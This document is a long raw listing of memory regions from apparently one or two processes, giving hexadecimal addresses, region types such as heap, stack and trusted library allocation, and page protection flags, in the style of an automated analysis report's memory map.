page read and write
1FC555C3000
heap
page read and write
26C00BE9000
trusted library allocation
page read and write
1FC54459000
heap
page read and write
26C00E08000
trusted library allocation
page read and write
1FC55671000
heap
page read and write
1FC5514E000
heap
page read and write
1FC5588A000
heap
page read and write
1FC54B8C000
heap
page read and write
1FC6108A000
heap
page read and write
1FC55852000
heap
page read and write
1FC61CA6000
heap
page read and write
1FC54CFD000
heap
page read and write
11288000
unkown
page readonly
1FC54DAD000
heap
page read and write
1FC54E59000
heap
page read and write
5A52000
heap
page read and write
1FC54B1C000
heap
page read and write
1FC5492B000
heap
page read and write
1FC55246000
heap
page read and write
392A000
stack
page read and write
1FC55837000
heap
page read and write
1FC53DFD000
heap
page read and write
1FC53B2E000
heap
page read and write
60CC000
heap
page read and write
1FC61A7E000
heap
page read and write
1FC539B9000
heap
page read and write
2FEB000
stack
page read and write
1FC54CD9000
heap
page read and write
1FC62666000
heap
page read and write
F2D000
heap
page read and write
1FC5587F000
heap
page read and write
F0C000
heap
page read and write
26C7523F000
heap
page read and write
F3B000
heap
page read and write
1FC53A01000
heap
page read and write
1FC55AAF000
heap
page read and write
7FFECC350000
trusted library allocation
page read and write
1FC5FD4E000
heap
page read and write
1FC556E5000
heap
page read and write
1FC55842000
heap
page read and write
1FC5552C000
heap
page read and write
1FC5504A000
heap
page read and write
1FC558F3000
heap
page read and write
1FC5486C000
heap
page read and write
1FC60934000
heap
page read and write
1FC54ADE000
heap
page read and write
1FC54E85000
heap
page read and write
1FC55A9F000
heap
page read and write
1FC53ACE000
heap
page read and write
EBC000
heap
page read and write
1FC55624000
heap
page read and write
1FC54539000
heap
page read and write
EF4000
heap
page read and write
1FC55732000
heap
page read and write
1FC6046E000
heap
page read and write
7FFECC450000
trusted library allocation
page read and write
7FFECBD90000
trusted library allocation
page read and write
1FC60DFC000
heap
page read and write
1FC557B2000
heap
page read and write
1FC550EE000
heap
page read and write
7FFECC4A0000
trusted library allocation
page read and write
2E68000
heap
page read and write
1FC5575E000
heap
page read and write
1FC556AC000
heap
page read and write
1FC624FC000
heap
page read and write
73A86000
unkown
page read and write
1FC55376000
heap
page read and write
1FC55162000
heap
page read and write
1FC54CAD000
heap
page read and write
1FC54C6D000
heap
page read and write
1FC607FE000
heap
page read and write
1FC559BB000
heap
page read and write
1FC62012000
heap
page read and write
1FC558AF000
heap
page read and write
1FC5455D000
heap
page read and write
1FC603E5000
heap
page read and write
1FC51B3E000
heap
page read and write
1FC55176000
heap
page read and write
1FC53BA0000
heap
page read and write
1FC545ED000
heap
page read and write
1FC611B0000
heap
page read and write
1FC6037E000
heap
page read and write
1FC540FD000
heap
page read and write
1FC54505000
heap
page read and write
1FC6223A000
heap
page read and write
1FC556A0000
heap
page read and write
1FC55AB3000
heap
page read and write
1FC54BD9000
heap
page read and write
1FC61B1A000
heap
page read and write
1FC5588B000
heap
page read and write
1FC6188E000
heap
page read and write
F2D000
heap
page read and write
1FC55675000
heap
page read and write
368F000
stack
page read and write
1FC55822000
heap
page read and write
1FC55272000
heap
page read and write
1FC55A1B000
heap
page read and write
1FC53981000
heap
page read and write
1FC54FCD000
heap
page read and write
1FC5FEDA000
heap
page read and write
1FC55062000
heap
page read and write
1FC62552000
heap
page read and write
1FC605A6000
heap
page read and write
1FC54DB1000
heap
page read and write
1FC55076000
heap
page read and write
1FC555D3000
heap
page read and write
1FC54FB5000
heap
page read and write
1FC55789000
heap
page read and write
1FC55266000
heap
page read and write
7FFECC4B0000
trusted library allocation
page execute and read and write
26C730F0000
trusted library allocation
page read and write
6CACE000
unkown
page read and write
7FFECBE80000
trusted library allocation
page read and write
1FC54FDE000
heap
page read and write
FA7CD4B000
stack
page read and write
1FC55548000
heap
page read and write
1FC55504000
heap
page read and write
1FC54837000
heap
page read and write
1FC55066000
heap
page read and write
1FC559BF000
heap
page read and write
1FC6279F000
heap
page read and write
1FC53961000
heap
page read and write
1FC544E1000
heap
page read and write
2DBB000
stack
page read and write
1FC6117A000
heap
page read and write
1FC54F55000
heap
page read and write
1FC55106000
heap
page read and write
7FFECBF60000
trusted library allocation
page read and write
1FC54F39000
heap
page read and write
7FFECBA3D000
trusted library allocation
page execute and read and write
1FC60F9A000
heap
page read and write
7FFECC560000
trusted library allocation
page read and write
1FC54828000
heap
page read and write
1FC55A3B000
heap
page read and write
1FC53B77000
heap
page read and write
1FC54CF1000
heap
page read and write
1FC60732000
heap
page read and write
1FC539ED000
heap
page read and write
26C00D2A000
trusted library allocation
page read and write
1FC54E19000
heap
page read and write
1FC6186A000
heap
page read and write
1FC54E1D000
heap
page read and write
60C5000
heap
page read and write
1FC54448000
heap
page read and write
3B6E000
stack
page read and write
1FC556B4000
heap
page read and write
1FC5487C000
heap
page read and write
1FC5FEB6000
heap
page read and write
1FC55862000
heap
page read and write
1FC617F2000
heap
page read and write
1FC559EF000
heap
page read and write
1FC621C2000
heap
page read and write
1FC5538E000
heap
page read and write
1FC54F25000
heap
page read and write
1FC55786000
heap
page read and write
1FC54C1D000
heap
page read and write
1FC5470A000
heap
page read and write
1FC548BA000
heap
page read and write
FA7CACE000
stack
page read and write
1FC55122000
heap
page read and write
1FC6219E000
heap
page read and write
1FC559A7000
heap
page read and write
7FFECBAE0000
trusted library allocation
page read and write
1FC55538000
heap
page read and write
1FC54E11000
heap
page read and write
1FC556ED000
heap
page read and write
26C00CEF000
trusted library allocation
page read and write
1FC547F8000
heap
page read and write
1FC54AD2000
heap
page read and write
1FC51917000
heap
page read and write
1FC54884000
heap
page read and write
1FC553AA000
heap
page read and write
1FC55706000
heap
page read and write
1FC53B75000
heap
page read and write
7FFECBD30000
trusted library allocation
page read and write
1FC558E3000
heap
page read and write
1FC54D2D000
heap
page read and write
1FC61AE4000
heap
page read and write
1FC544AD000
heap
page read and write
1FC60102000
heap
page read and write
1FC61114000
heap
page read and write
1FC53A25000
heap
page read and write
1FC55604000
heap
page read and write
1FC54CB1000
heap
page read and write
1FC54F15000
heap
page read and write
3FBD000
stack
page read and write
1FC54A0B000
heap
page read and write
FA7BB7A000
stack
page read and write
1FC556FA000
heap
page read and write
1FC54B5C000
heap
page read and write
1FC5539E000
heap
page read and write
1FC53EC5000
heap
page read and write
1FC5FFEE000
heap
page read and write
1FC54AEE000
heap
page read and write
1FC55A73000
heap
page read and write
1FC5452D000
heap
page read and write
1FC55967000
heap
page read and write
1FC544D9000
heap
page read and write
1FC5447D000
heap
page read and write
1FC5574E000
heap
page read and write
1FC54BBC000
heap
page read and write
1FC54E81000
heap
page read and write
1FC54C19000
heap
page read and write
1FC5592B000
heap
page read and write
FB0000
heap
page read and write
1FC5451D000
heap
page read and write
7FFECC460000
trusted library allocation
page read and write
1FC55595000
heap
page read and write
1FC5585A000
heap
page read and write
1FC600BA000
heap
page read and write
59D0000
heap
page read and write
53BE000
stack
page read and write
59CF000
heap
page read and write
1FC550CA000
heap
page read and write
1FC5551C000
heap
page read and write
1FC54ACA000
heap
page read and write
7FFECC410000
trusted library allocation
page read and write
1FC5586F000
heap
page read and write
1FC51AC1000
heap
page read and write
1FC60BD4000
heap
page read and write
1FC54F1D000
heap
page read and write
1FC60E86000
heap
page read and write
1FC55026000
heap
page read and write
1FC55052000
heap
page read and write
1FC551C6000
heap
page read and write
EF2000
heap
page read and write
1FC55752000
heap
page read and write
1FC548BE000
heap
page read and write
1FC54A7E000
heap
page read and write
1FC55628000
heap
page read and write
F2D000
heap
page read and write
1FC559E7000
heap
page read and write
1FC5FE62000
heap
page read and write
1FC558F6000
heap
page read and write
1FC53B5E000
heap
page read and write
1FC55648000
heap
page read and write
FA7BC7E000
stack
page read and write
1FC54C61000
heap
page read and write
1FC550AA000
heap
page read and write
2FAE000
stack
page read and write
574F000
stack
page read and write
1FC5490F000
heap
page read and write
1FC61408000
heap
page read and write
1FC5591F000
heap
page read and write
1FC5582F000
heap
page read and write
1FC5579E000
heap
page read and write
1FC557EB000
heap
page read and write
1FC53A29000
heap
page read and write
26C00BC8000
trusted library allocation
page read and write
1FC54F3D000
heap
page read and write
7FFECC5A0000
trusted library allocation
page read and write
1FC55256000
heap
page read and write
1FC54BD4000
heap
page read and write
1FC622C4000
heap
page read and write
1FC5539A000
heap
page read and write
1FC609E2000
heap
page read and write
EC4000
heap
page read and write
1FC60AF6000
heap
page read and write
1FC544A1000
heap
page read and write
1FC603D2000
heap
page read and write
1FC5581B000
heap
page read and write
1FC55641000
heap
page read and write
1FC55600000
heap
page read and write
1FC5574B000
heap
page read and write
1FC539C5000
heap
page read and write
1FC61450000
heap
page read and write
1FC5528A000
heap
page read and write
26C00D79000
trusted library allocation
page read and write
1FC55893000
heap
page read and write
1FC54465000
heap
page read and write
1FC557BE000
heap
page read and write
1FC543FE000
heap
page read and write
1FC53BF9000
heap
page read and write
1FC5502A000
heap
page read and write
1FC61C82000
heap
page read and write
1FC55216000
heap
page read and write
FA7BFFE000
stack
page read and write
1FC55182000
heap
page read and write
1FC616BA000
heap
page read and write
112DF000
unkown
page readonly
1FC538ED000
heap
page read and write
6CA81000
unkown
page execute read
1FC556B8000
heap
page read and write
1FC5569D000
heap
page read and write
7FFECBC73000
trusted library allocation
page read and write
1FC557B2000
heap
page read and write
1FC55196000
heap
page read and write
1FC558E6000
heap
page read and write
599A000
heap
page read and write
1FC555F0000
heap
page read and write
1FC5480A000
heap
page read and write
1FC556B1000
heap
page read and write
1FC5556C000
heap
page read and write
1FC5481C000
heap
page read and write
1FC6132A000
heap
page read and write
1FC5557E000
heap
page read and write
1FC557B6000
heap
page read and write
1FC54CBD000
heap
page read and write
1FC55286000
heap
page read and write
1FC54CB9000
heap
page read and write
26C0043D000
trusted library allocation
page read and write
1FC55A8F000
heap
page read and write
1FC55658000
heap
page read and write
1FC5572E000
heap
page read and write
1FC5510E000
heap
page read and write
1FC558BF000
heap
page read and write
1FC54B2C000
heap
page read and write
1FC55772000
heap
page read and write
1FC545FD000
heap
page read and write
1FC54C81000
heap
page read and write
1FC52487000
heap
page read and write
3829000
heap
page read and write
1FC54D75000
heap
page read and write
1FC55032000
heap
page read and write
747F3000
unkown
page read and write
1FC5462D000
heap
page read and write
1FC54482000
heap
page read and write
1FC5577E000
heap
page read and write
1FC556A1000
heap
page read and write
F0D000
heap
page read and write
59AA000
heap
page read and write
59EF000
heap
page read and write
1FC519FB000
heap
page read and write
1FC55661000
heap
page read and write
26C01BC6000
trusted library allocation
page read and write
1FC607BC000
heap
page read and write
59AC000
heap
page read and write
1FC61FE0000
heap
page read and write
1FC54C71000
heap
page read and write
1FC5578E000
heap
page read and write
1FC53971000
heap
page read and write
1FC54499000
heap
page read and write
1FC54A76000
heap
page read and write
26C74F07000
heap
page read and write
1FC5524A000
heap
page read and write
1FC542FD000
heap
page read and write
1FC55866000
heap
page read and write
1FC55817000
heap
page read and write
1FC55564000
heap
page read and write
1FC61C70000
heap
page read and write
1FC557BF000
heap
page read and write
1FC556A4000
heap
page read and write
1FC55551000
heap
page read and write
1FC54903000
heap
page read and write
1FC54D59000
heap
page read and write
1FC54F2D000
heap
page read and write
1FC5491F000
heap
page read and write
1FC55518000
heap
page read and write
1FC55692000
heap
page read and write
FA7BAFE000
stack
page read and write
1FC5567D000
heap
page read and write
1FC57BD1000
heap
page read and write
1FC555F4000
heap
page read and write
1FC544CD000
heap
page read and write
1FC55524000
heap
page read and write
1FC55569000
heap
page read and write
1FC6127C000
heap
page read and write
1FC55669000
heap
page read and write
1FC603F6000
heap
page read and write
1FC5596F000
heap
page read and write
1FC54471000
heap
page read and write
1FC60786000
heap
page read and write
1FC555AD000
heap
page read and write
26C73120000
trusted library allocation
page read and write
1FC553CA000
heap
page read and write
1FC5FFEF000
heap
page read and write
26C74EB7000
heap
page execute and read and write
1FC54545000
heap
page read and write
1FC55645000
heap
page read and write
596D000
heap
page read and write
1FC55698000
heap
page read and write
1FC54CC1000
heap
page read and write
1FC5570A000
heap
page read and write
1FC61318000
heap
page read and write
26C11006000
trusted library allocation
page read and write
1FC55396000
heap
page read and write
1FC54C7D000
heap
page read and write
7FFECC150000
trusted library allocation
page read and write
1FC54479000
heap
page read and write
7FFECC260000
trusted library allocation
page read and write
1FC54917000
heap
page read and write
26C75360000
heap
page read and write
1FC6161E000
heap
page read and write
1FC551DE000
heap
page read and write
1FC62228000
heap
page read and write
1FC54C39000
heap
page read and write
7FFECBD20000
trusted library allocation
page read and write
1FC55649000
heap
page read and write
1FC55276000
heap
page read and write
1FC55541000
heap
page read and write
1FC5394D000
heap
page read and write
26C00D98000
trusted library allocation
page read and write
1FC5500A000
heap
page read and write
1FC6123A000
heap
page read and write
1FC54D1D000
heap
page read and write
1FC552D2000
heap
page read and write
1FC5445D000
heap
page read and write
1FC539C9000
heap
page read and write
1FC61B5C000
heap
page read and write
1FC55773000
heap
page read and write
1FC608BE000
heap
page read and write
1FC5562C000
heap
page read and write
26C75330000
heap
page read and write
1FC5576F000
heap
page read and write
1FC54CDD000
heap
page read and write
1FC5449D000
heap
page read and write
1FC539E9000
heap
page read and write
1FC556D5000
heap
page read and write
1FC55843000
heap
page read and write
1FC53966000
heap
page read and write
6094000
heap
page read and write
1FC55737000
heap
page read and write
73A80000
unkown
page readonly
1FC54E45000
heap
page read and write
1FC519E1000
heap
page read and write
1FC551D6000
heap
page read and write
1FC5482C000
heap
page read and write
1FC5450D000
heap
page read and write
1FC618B1000
heap
page read and write
1FC55731000
heap
page read and write
1FC54930000
heap
page read and write
1FC60A36000
heap
page read and write
1FC54878000
heap
page read and write
1FC53985000
heap
page read and write
FA7BEF6000
stack
page read and write
1FC559FF000
heap
page read and write
1FC55827000
heap
page read and write
1FC553AE000
heap
page read and write
599B000
heap
page read and write
1FC55560000
heap
page read and write
1FC55568000
heap
page read and write
1FC51AD8000
heap
page read and write
1FC555A5000
heap
page read and write
1FC54EED000
heap
page read and write
1FC55A77000
heap
page read and write
1FC544E5000
heap
page read and write
1FC5576E000
heap
page read and write
1FC5513A000
heap
page read and write
1FC55012000
heap
page read and write
1FC55581000
heap
page read and write
26C00088000
trusted library allocation
page read and write
1FC62829000
heap
page read and write
1FC53AC9000
heap
page read and write
1FC626DE000
heap
page read and write
1FC53901000
heap
page read and write
7FFECC530000
trusted library allocation
page read and write
1FC54D6D000
heap
page read and write
1FC5589A000
heap
page read and write
1FC54D01000
heap
page read and write
1FC54B80000
heap
page read and write
1FC53A4C000
heap
page read and write
1FC5FD2A000
heap
page read and write
5A54000
heap
page read and write
1FC551FA000
heap
page read and write
1FC557CA000
heap
page read and write
7FFECBE42000
trusted library allocation
page read and write
1FC54ACE000
heap
page read and write
1FC55631000
heap
page read and write
FA7BDF4000
stack
page read and write
1FC558C3000
heap
page read and write
1FC557A6000
heap
page read and write
1FC54B4C000
heap
page read and write
1FC54D31000
heap
page read and write
1FC556C9000
heap
page read and write
1FC54B34000
heap
page read and write
1FC55296000
heap
page read and write
1FC53A05000
heap
page read and write
FA7BD76000
stack
page read and write
F33000
heap
page read and write
1FC558E7000
heap
page read and write
26C7517C000
heap
page read and write
1FC5582B000
heap
page read and write
1FC54DCD000
heap
page read and write
1FC558CE000
heap
page read and write
1FC54629000
heap
page read and write
1FC5558E000
heap
page read and write
1FC5581A000
heap
page read and write
1FC53EFC000
heap
page read and write
1FC5570E000
heap
page read and write
1FC54C91000
heap
page read and write
1FC5396C000
heap
page read and write
1FC55715000
heap
page read and write
7FFECC3E0000
trusted library allocation
page read and write
1FC54451000
heap
page read and write
1FC545D9000
heap
page read and write
1FC5505E000
heap
page read and write
111E2000
unkown
page read and write
F39000
heap
page read and write
1FC55565000
heap
page read and write
1FC613C6000
heap
page read and write
59A8000
heap
page read and write
1FC539B1000
heap
page read and write
1FC54D7D000
heap
page read and write
1FC556C5000
heap
page read and write
5990000
heap
page read and write
1FC5580B000
heap
page read and write
1FC51ACA000
heap
page read and write
1FC54AE6000
heap
page read and write
1FC55747000
heap
page read and write
1FC54266000
heap
page read and write
1FC619D0000
heap
page read and write
EF9000
heap
page read and write
1FC60F52000
heap
page read and write
7FFECBD70000
trusted library allocation
page read and write
1FC5523E000
heap
page read and write
1FC54AF6000
heap
page read and write
1FC54C8D000
heap
page read and write
ED2000
heap
page read and write
1FC5575B000
heap
page read and write
1FC5598B000
heap
page read and write
1FC5592F000
heap
page read and write
1FC551F2000
heap
page read and write
7FFECC020000
trusted library allocation
page read and write
1FC555DF000
heap
page read and write
1FC556F1000
heap
page read and write
1FC53E2D000
heap
page read and write
FA7BCFE000
stack
page read and write
26C75380000
heap
page read and write
7FFECBF70000
trusted library allocation
page read and write
FB5000
heap
page read and write
1FC620E4000
heap
page read and write
1FC54E31000
heap
page read and write
1FC55342000
heap
page read and write
5997000
heap
page read and write
1FC556DD000
heap
page read and write
1FC61834000
heap
page read and write
1FC550D6000
heap
page read and write
1FC61E98000
heap
page read and write
1FC54D41000
heap
page read and write
1FC54E15000
heap
page read and write
1FC54F31000
heap
page read and write
1FC60AD2000
heap
page read and write
7FFECBBD0000
trusted library allocation
page read and write
1FC539FD000
heap
page read and write
1FC6051C000
heap
page read and write
1FC54EE9000
heap
page read and write
1FC54923000
heap
page read and write
1FC555B9000
heap
page read and write
1FC624C8000
heap
page read and write
1FC616F0000
heap
page read and write
1FC54346000
heap
page read and write
1FC5576B000
heap
page read and write
1FC54CA1000
heap
page read and write
1FC5563C000
heap
page read and write
1FC539E5000
heap
page read and write
1FC60A48000
heap
page read and write
73A81000
unkown
page execute read
1FC60DD8000
heap
page read and write
1FC6268A000
heap
page read and write
1FC5533E000
heap
page read and write
1FC53A7A000
heap
page read and write
1FC60BC2000
heap
page read and write
1FC54485000
heap
page read and write
1FC629D6000
heap
page read and write
1FC5FCB3000
heap
page read and write
1FC54A0A000
heap
page read and write
EF2000
heap
page read and write
1FC55599000
heap
page read and write
1FC54EA5000
heap
page read and write
1FC556E5000
heap
page read and write
1FC54D11000
heap
page read and write
7FFECBCC0000
trusted library allocation
page read and write
1FC5583B000
heap
page read and write
1FC55561000
heap
page read and write
1FC55082000
heap
page read and write
EFB000
heap
page read and write
1FC61904000
heap
page read and write
F37000
heap
page read and write
1FC55913000
heap
page read and write
1FC5470A000
heap
page read and write
26C730B0000
heap
page readonly
1FC55609000
heap
page read and write
1FC55812000
heap
page read and write
1FC54B7C000
heap
page read and write
EE9000
heap
page read and write
1FC554BD000
heap
page read and write
11194000
unkown
page readonly
1FC60582000
heap
page read and write
1FC62036000
heap
page read and write
1FC54C11000
heap
page read and write
EE8000
heap
page read and write
1FC550AE000
heap
page read and write
1FC5472A000
heap
page read and write
1FC54D25000
heap
page read and write
1FC558D2000
heap
page read and write
1FC559F9000
heap
page read and write
1FC5527A000
heap
page read and write
1FC61B6E000
heap
page read and write
1FC556BC000
heap
page read and write
1FC53988000
heap
page read and write
F39000
heap
page read and write
1FC6205A000
heap
page read and write
1FC54F41000
heap
page read and write
1FC5503A000
heap
page read and write
1FC62588000
heap
page read and write
1FC55A63000
heap
page read and write
1FC54BD0000
heap
page read and write
1FC60AC0000
heap
page read and write
1FC617AA000
heap
page read and write
1FC5596B000
heap
page read and write
1FC54B64000
heap
page read and write
1FC5562D000
heap
page read and write
1FC545E5000
heap
page read and write
1FC54E09000
heap
page read and write
1FC552C6000
heap
page read and write
584D000
stack
page read and write
1FC54DB9000
heap
page read and write
1FC57D4F000
heap
page read and write
1FC551A2000
heap
page read and write
1FC5508A000
heap
page read and write
1FC5599F000
heap
page read and write
EFB000
heap
page read and write
1FC5582A000
heap
page read and write
1FC548B2000
heap
page read and write
7FFECC2B0000
trusted library allocation
page read and write
1FC545F9000
heap
page read and write
1FC53AFE000
heap
page read and write
1FC555CF000
heap
page read and write
1FC54D91000
heap
page read and write
1FC54815000
heap
page read and write
1FC553B2000
heap
page read and write
1FC54F8D000
heap
page read and write
1FC6224C000
heap
page read and write
1FC54F35000
heap
page read and write
1FC5557A000
heap
page read and write
1FC54F4D000
heap
page read and write
5A3D000
heap
page read and write
1FC61AF6000
heap
page read and write
1FC55545000
heap
page read and write
1FC5463C000
heap
page read and write
FA7CCCE000
stack
page read and write
1FC544D1000
heap
page read and write
1FC54709000
heap
page read and write
1FC54C55000
heap
page read and write
1FC53A4C000
heap
page read and write
1FC544BD000
heap
page read and write
1FC613A2000
heap
page read and write
1FC555BA000
heap
page read and write
7FFECC230000
trusted library allocation
page read and write
7FFECBD50000
trusted library allocation
page execute and read and write
1FC54F89000
heap
page read and write
1FC55586000
heap
page read and write
1FC54D9D000
heap
page read and write
1FC545A1000
heap
page read and write
1FC553BE000
heap
page read and write
1FC6060C000
heap
page read and write
1FC556FE000
heap
page read and write
7FFECC070000
trusted library allocation
page read and write
2F6E000
stack
page read and write
7FFECC53D000
trusted library allocation
page read and write
1FC61858000
heap
page read and write
1FC617E0000
heap
page read and write
59C7000
heap
page read and write
59D0000
heap
page read and write
1FC544FD000
heap
page read and write
1FC5503E000
heap
page read and write
1FC54ECD000
heap
page read and write
1FC5E92B000
heap
page read and write
1FC559FB000
heap
page read and write
1FC54BB4000
heap
page read and write
1FC60EEC000
heap
page read and write
1FC54913000
heap
page read and write
1FC557C3000
heap
page read and write
1FC54E29000
heap
page read and write
1FC5560D000
heap
page read and write
1FC5564D000
heap
page read and write
1FC55592000
heap
page read and write
1FC518D1000
heap
page read and write
1FC61C70000
heap
page read and write
1FC51977000
heap
page read and write
1FC544F9000
heap
page read and write
1FC54ABE000
heap
page read and write
1FC5512A000
heap
page read and write
1FC55763000
heap
page read and write
1FC61024000
heap
page read and write
1FC5516E000
heap
page read and write
26C72E30000
heap
page read and write
1FC53A09000
heap
page read and write
1FC552D6000
heap
page read and write
1FC553C2000
heap
page read and write
1FC558EB000
heap
page read and write
1FC558EE000
heap
page read and write
1FC61654000
heap
page read and write
1FC6119E000
heap
page read and write
1FC548EF000
heap
page read and write
1FC5FEDB000
heap
page read and write
1FC61F10000
heap
page read and write
26C10011000
trusted library allocation
page read and write
1FC61DA8000
heap
page read and write
26C018E5000
trusted library allocation
page read and write
7FFECC2A0000
trusted library allocation
page read and write
EAA000
heap
page read and write
1FC53CFC000
heap
page read and write
1FC54BB0000
heap
page read and write
1FC539F9000
heap
page read and write
1FC54B14000
heap
page read and write
1FC61126000
heap
page read and write
7FFECC2C0000
trusted library allocation
page execute and read and write
1FC558B7000
heap
page read and write
1FC55651000
heap
page read and write
1FC54E5D000
heap
page read and write
1FC555D7000
heap
page read and write
1FC539C1000
heap
page read and write
1FC544B5000
heap
page read and write
1FC5583F000
heap
page read and write
1FC54D55000
heap
page read and write
1FC5398D000
heap
page read and write
1FC61B92000
heap
page read and write
1FC5444D000
heap
page read and write
26C00E34000
trusted library allocation
page read and write
1FC53950000
heap
page read and write
1FC53954000
heap
page read and write
1FC62360000
heap
page read and write
1FC60AAE000
heap
page read and write
1FC53A11000
heap
page read and write
F24000
heap
page read and write
1FC55AA7000
heap
page read and write
1FC543F1000
heap
page read and write
1FC54864000
heap
page read and write
1FC60774000
heap
page read and write
1FC552AA000
heap
page read and write
F39000
heap
page read and write
1FC555A2000
heap
page read and write
1FC54B68000
heap
page read and write
1FC550DE000
heap
page read and write
1FC557AA000
heap
page read and write
1FC57274000
heap
page read and write
1FC615A6000
heap
page read and write
1FC616DE000
heap
page read and write
1FC55701000
heap
page read and write
1FC55A03000
heap
page read and write
1FC6243E000
heap
page read and write
1FC55762000
heap
page read and write
1FC62126000
heap
page read and write
1FC5588D000
heap
page read and write
7FFECBE50000
trusted library allocation
page execute and read and write
1FC54E55000
heap
page read and write
1FC54B48000
heap
page read and write
1FC548FF000
heap
page read and write
1FC54CD1000
heap
page read and write
1FC5587A000
heap
page read and write
1FC55927000
heap
page read and write
1FC55887000
heap
page read and write
1FC55528000
heap
page read and write
1FC5480D000
heap
page read and write
54FE000
stack
page read and write
1FC559B7000
heap
page read and write
1FC53915000
heap
page read and write
1FC54709000
heap
page read and write
59DA000
heap
page read and write
1FC55856000
heap
page read and write
1FC622AF000
heap
page read and write
1FC5729D000
heap
page read and write
1FC55A53000
heap
page read and write
1FC54B20000
heap
page read and write
1FC60BF9000
heap
page read and write
111F1000
unkown
page read and write
1FC55A7B000
heap
page read and write
1FC5384D000
heap
page read and write
7FFECBA8C000
trusted library allocation
page execute and read and write
537F000
stack
page read and write
26C01687000
trusted library allocation
page read and write
1FC54BE5000
heap
page read and write
1FC55857000
heap
page read and write
1FC54804000
heap
page read and write
1FC6128E000
heap
page read and write
1FC55582000
heap
page read and write
1FC6089A000
heap
page read and write
1FC5593F000
heap
page read and write
1FC54CE5000
heap
page read and write
1FC5507A000
heap
page read and write
1FC54F19000
heap
page read and write
1FC608E1000
heap
page read and write
26C01904000
trusted library allocation
page read and write
1FC61FD0000
heap
page read and write
1FC6118C000
heap
page read and write
1FC5577F000
heap
page read and write
EDA000
heap
page read and write
1FC558FF000
heap
page read and write
1FC54BAC000
heap
page read and write
26C018BA000
trusted library allocation
page read and write
1FC55558000
heap
page read and write
1FC55873000
heap
page read and write
1FC54C2D000
heap
page read and write
FA7B78E000
stack
page read and write
1FC539D9000
heap
page read and write
1FC5566D000
heap
page read and write
1FC55679000
heap
page read and write
1FC55766000
heap
page read and write
1FC54E51000
heap
page read and write
1FC61A5B000
heap
page read and write
3494000
heap
page read and write
1FC5535E000
heap
page read and write
5997000
heap
page read and write
1FC55AC4000
heap
page read and write
1FC5506E000
heap
page read and write
1FC556D9000
heap
page read and write
1FC5491B000
heap
page read and write
1FC54BC0000
heap
page read and write
ABA000
stack
page read and write
1FC55847000
heap
page read and write
1FC54D69000
heap
page read and write
7FFECC383000
trusted library allocation
page read and write
1FC557F7000
heap
page read and write
1FC55146000
heap
page read and write
1FC53D19000
heap
page read and write
7FFECC490000
trusted library allocation
page read and write
1FC614B6000
heap
page read and write
1FC55046000
heap
page read and write
1FC60078000
heap
page read and write
2E60000
heap
page read and write
1FC628C9000
heap
page read and write
1FC556D1000
heap
page read and write
1FC53978000
heap
page read and write
1FC554F8000
heap
page read and write
1FC60834000
heap
page read and write
7FFECC270000
trusted library allocation
page read and write
1FC5FCD6000
heap
page read and write
1FC5463C000
heap
page read and write
1FC545AD000
heap
page read and write
1FC55508000
heap
page read and write
1FC539D5000
heap
page read and write
1FC54B3C000
heap
page read and write
1FC5598F000
heap
page read and write
1FC55604000
heap
page read and write
1FC6234E000
heap
page read and write
1FC627E0000
heap
page read and write
1FC54D79000
heap
page read and write
1FC55ABC000
heap
page read and write
3FFE000
stack
page read and write
F0C000
heap
page read and write
6CD54000
unkown
page read and write
1FC55726000
heap
page read and write
1FC5585B000
heap
page read and write
26C7530D000
heap
page read and write
1FC54DC1000
heap
page read and write
1FC552DE000
heap
page read and write
26C10009000
trusted library allocation
page read and write
1FC54EB1000
heap
page read and write
1FC6198E000
heap
page read and write
1FC54CF9000
heap
page read and write
1FC54C35000
heap
page read and write
1FC555DF000
heap
page read and write
1FC53B62000
heap
page read and write
1FC62462000
heap
page read and write
EA1000
heap
page read and write
1FC606FC000
heap
page read and write
1FC545CD000
heap
page read and write
1FC54BA8000
heap
page read and write
1FC54C0D000
heap
page read and write
2E3E000
stack
page read and write
26C00B68000
trusted library allocation
page read and write
1FC55302000
heap
page read and write
1FC5556A000
heap
page read and write
1FC55A2B000
heap
page read and write
1FC54828000
heap
page read and write
1FC555C1000
heap
page read and write
1FC5526E000
heap
page read and write
1FC545B5000
heap
page read and write
1FC600F0000
heap
page read and write
1FC556C0000
heap
page read and write
1FC55A13000
heap
page read and write
1FC62510000
heap
page read and write
1FC54B10000
heap
page read and write
1FC550CE000
heap
page read and write
1FC61666000
heap
page read and write
1FC55555000
heap
page read and write
1FC53958000
heap
page read and write
1FC55882000
heap
page read and write
1FC54E99000
heap
page read and write
1FC5536E000
heap
page read and write
1FC54E65000
heap
page read and write
1FC54AFA000
heap
page read and write
1FC53A81000
heap
page read and write
1FC54F81000
heap
page read and write
5A3D000
heap
page read and write
1FC555B2000
heap
page read and write
1FC55514000
heap
page read and write
1FC54907000
heap
page read and write
34A4000
heap
page read and write
1FC538F5000
heap
page read and write
1FC55A5F000
heap
page read and write
7FFECBE90000
trusted library allocation
page read and write
1FC55620000
heap
page read and write
1FC61BA4000
heap
page read and write
1FC62372000
heap
page read and write
1FC55610000
heap
page read and write
1FC623C3000
heap
page read and write
1FC5FBC2000
heap
page read and write
7FFECBEF0000
trusted library allocation
page read and write
1FC558E2000
heap
page read and write
1FC53975000
heap
page read and write
1FC555F8000
heap
page read and write
1FC61643000
heap
page read and write
1FC5574F000
heap
page read and write
1FC54EB9000
heap
page read and write
1FC5463C000
heap
page read and write
1FC61744000
heap
page read and write
1FC54A6A000
heap
page read and write
1FC54469000
heap
page read and write
1FC54EC5000
heap
page read and write
2E65000
heap
page read and write
3044000
heap
page read and write
1FC60888000
heap
page read and write
1FC5FEA4000
heap
page read and write
1FC555A6000
heap
page read and write
1FC557E3000
heap
page read and write
1FC54C09000
heap
page read and write
1FC602D0000
heap
page read and write
1FC54DE5000
heap
page read and write
1FC552F6000
heap
page read and write
1FC55A67000
heap
page read and write
1FC5558A000
heap
page read and write
1FC54BB8000
heap
page read and write
1FC54BE1000
heap
page read and write
1FC54DDD000
heap
page read and write
1132B000
unkown
page readonly
1FC5FDB4000
heap
page read and write
1FC610AE000
heap
page read and write
1FC554DC000
heap
page read and write
1FC550BA000
heap
page read and write
1FC54FA5000
heap
page read and write
1FC55846000
heap
page read and write
1FC54A5A000
heap
page read and write
1FC623EA000
heap
page read and write
60AD000
heap
page read and write
1FC5532E000
heap
page read and write
1FC558A7000
heap
page read and write
1FC616A8000
heap
page read and write
1FC557CB000
heap
page read and write
1FC55876000
heap
page read and write
7FFECBCA0000
trusted library allocation
page read and write
1FC6141A000
heap
page read and write
1FC557C2000
heap
